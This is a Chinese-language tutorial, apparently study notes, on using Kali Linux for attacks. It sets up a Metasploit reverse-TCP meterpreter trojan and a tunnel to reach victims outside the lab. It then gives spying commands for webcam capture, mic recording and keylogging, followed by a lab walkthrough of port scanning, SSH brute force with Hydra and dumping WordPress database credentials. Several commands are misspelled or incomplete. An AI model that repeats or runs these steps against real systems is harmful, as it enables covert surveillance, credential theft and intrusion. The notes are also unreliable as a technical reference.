# Kali 攻击机渗透教程

# 植入后门

  1. 设置攻击机 IP 和端口:
  • LHOST: 攻击机 IP( ifconfig 查看)。
  • LPORT: 自定义端口(范围 1-65535)。
  1. 注入后门时出现 Injection Completed! 表示注入完成。

# kali 攻击机

  1. 启动工具:msfconsole(攻击框架)
  2. 加载有效攻击载体(相当于导弹发射台 + 导弹本身): use exploit/multi/handler
  3. 设置有效攻击载何: set payload 【windows/meterpreret/reverse_tcp】(设置什么就保持一致;相当于弹头)
  4. show options
  5. 设置攻击机参数:
  • set LHOST = 设置 kali 攻击机的 IP
  • set LPORT = 前面自定义的端口大小
  • run
  1. 出现:等待状态(钓鱼)
  2. 开另一个 windows 虚拟机(网络模式和 kali 一致 —NAT)
  3. ping 攻击机 kali 的 IP(查看是否 ping 的通)

# 木马传输与执行

  1. cmd 打开

  2. cd desktop 找到木马

  3. 在目录下输入 cmd 打开

  4. 输入 -m http.server 8080(端口)

  5. 在新开的 windows 虚拟机里面访问: http://真实机IP:8080(端口)

  6. 下载,运行

  7. 此时 kali 攻击机则会出现:meterpreter >

  8. 输入:screenshot (截屏)

  9. 在 kali 攻击机里面新建一个窗口,进入 root 模式

  10. 查看帮助 apt-get - -help ,安装工具: apt update /apt-get update

  11. kali 攻击机的原窗口

    • 输入:screenshare(共享屏幕)
    • meterpreter > pwd
    • meterpreter > mkdir 目录名(在桌面创建一个目录)
    • meterpreter > cd 目录名 \
    • meterpreter > dir
    • meterpreter > upload 文件名(想要传入的文件)
    • meterpreter > ls(查看)
    • meterpreter > download 文件名(下载文件)
  12. 在 kali 攻击机另一个窗口输入: cat 下载的文件名

# 网络木马

  1. 小米球
    • 系统管理
    • 账户管理
    • 我的隧道:
    • 协议:TCP
    • 本地服务地址:攻击机 IP:端口(攻击机)
    • 我的账户 - 拷贝隧道
  2. xiaomiqiu.conf 文件下将 auth_token 后改为拷贝的隧道
  3. 小米球 bat 显示 online
  4. ping 一下它显示的 IP,再次打开 ssl
  5. 输入 LHOST:小米球给的 IP,LPORT:小米球分配的端口
  6. 植入完成,打包一下丢出去

# kali 攻击机

  • meterpreter > sysinfo
  • meterpreter > pwd
  • meterpreter > webcam_list(摄像头列表)
  • meterpreter > webcam_snap(摄像头截图)
  • meterpreter > webcam_stream(实时摄像头)
  • meterpreter > record_mic -d 10(麦克风,10 代表 10s)
  • meterpreter > keyscan_start(截取操作数据)
  • meterpreter > keycan_dump(抓取数据)
  • meterpreter >play 截取声音的路径(在受攻击的电脑播放声音)

# 确保 kali 和目标机网络模式一样

  1. kali 里面工具:
    netdiscover -i eth0(网卡名) -r 192.168.86.0/24 (.2是网关)
  2. 采端口:
    masscan -p0-65535 192.168.86.137 - -rate = 10000 port-端口
  3. ping 192.168.86.133
  4. ttl
  5. 真实机:
  • cmd
  • ssh ip
  1. Xshell:
  • ssh ip
  • 接受并保存
  • 泄漏:服务器类型
  • 开始网上查

# 进入 kali:

msfconsole(渗透测试框架)

search auxiliary ssh user
use 6
show options
set rhosts 192.168.86.133
set user_file 

# 新建终端:

locate wordlist root (忘记了可以查:ls/usr/share/wordlists)

ls /usr/share/wordlists/metasploit -a

cd /usr/share/wordlists/metasploit

ls -l

找到 common_roots.txt(用户名字典)
完整路径:/usr/share/wordlists/metasploit/common_roots.txt

# 回到之前的终端:

复制完整路径: set user_file /user/share/wordlists/metasploit/common_roots.txt

检查清单: show options

run

# 将找到的用户名复制做成字典

  1. 桌面建一个文本文档
  2. Search-Find and Replace
  3. Search for:User 前面一坨
  4. Replace with:不用填 (同样方法把 find 替换掉)

# kali 的用户名:

cat /etc/passwd

  1. nologin(不能登录)
  2. 找到能登录的用户名
  3. 保存到桌面

# 终端:

cat user.txt(保存的)

cd /usr/share/wordlists

ls-l

  1. 找到 rockyou.txt.gz
  2. 拷贝:cp rockyou.txt.gz/root/Desktop/
  3. 回到桌面:cd /root/Desktop
  4. 解压:gunzip rockyou.txt.gz

# Hydra(九头蛇)暴力破解

hydra -L user.txt -P rockyou.txt -t 6 ssh://192.168.86.133

# 开一个终端

ssh 用户名@192.168.86.133

进入网站找线索:192.168.86.133 (Wordpress 等)

  • cd/
  • ls (或者:- cd/var -ls)
  • www/
  • ls (有 flag)
  • cat flag.txt
  • ls
  • cd html/
  • cd wordpress/
  • ls
  • cat wp-config.php
  • 找到密码

# Xshell 里面登陆

  • mysql -u root -p;
  • show databases;
  • use wordpress;
  • show tables;
  • select *from wp_users;
  • 网站 MD5 解密
  • 也可以直接创建一个密码替换进去(网上找)

# 网站乱码:

  • network
  • 打开域名
  • 打开火绒
  • 打开 host 修改器
  • 输入:192.168.86.133 域名(不要带 http)